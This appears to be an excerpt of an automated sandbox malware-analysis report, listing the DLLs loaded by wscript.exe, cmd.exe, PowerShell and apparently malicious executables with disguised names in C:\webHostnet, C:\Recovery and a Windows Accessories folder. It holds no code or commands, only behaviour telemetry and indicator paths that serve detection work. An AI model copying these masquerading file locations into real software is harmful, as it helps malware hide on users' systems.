                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: version.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: schannel.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: mskeyprotect.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: ntasn1.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: ncrypt.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: ncryptsslp.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: rasapi32.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: rasman.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: rtutils.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: mswsock.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: winhttp.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: iphlpapi.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: dhcpcsvc.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: dnsapi.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: winnsi.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: rasadhlp.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: fwpuclnt.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: dwrite.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: winmm.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: winmmbase.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: mmdevapi.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: devobj.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: ksuser.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: avrt.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: audioses.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: powrprof.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: umpdc.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: msacm32.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: midimap.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: windowscodecs.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: dpapi.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: secur32.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: schannel.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: mskeyprotect.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: ntasn1.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: ncrypt.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: ncryptsslp.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: msasn1.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: gpapi.dllJump to behavior
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: mscoree.dll
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: version.dll
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: uxtheme.dll
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: windows.storage.dll
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: wldp.dll
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: profapi.dll
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: cryptsp.dll
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: rsaenh.dll
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: cryptbase.dll
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exeSection loaded: sspicli.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: apphelp.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: version.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: wldp.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: profapi.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: sspicli.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: mscoree.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: version.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: wldp.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: profapi.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files\Windows NT\Accessories\en-GB\Idle.exeSection loaded: sspicli.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: mscoree.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: kernel.appcore.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: version.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: uxtheme.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: windows.storage.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: wldp.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: profapi.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: cryptsp.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: rsaenh.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: cryptbase.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: sspicli.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: mscoree.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: kernel.appcore.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: version.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: uxtheme.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: windows.storage.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: wldp.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: profapi.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: cryptsp.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: rsaenh.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: cryptbase.dll
                                    Source: C:\webHostnet\MsPortSavesruntime.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
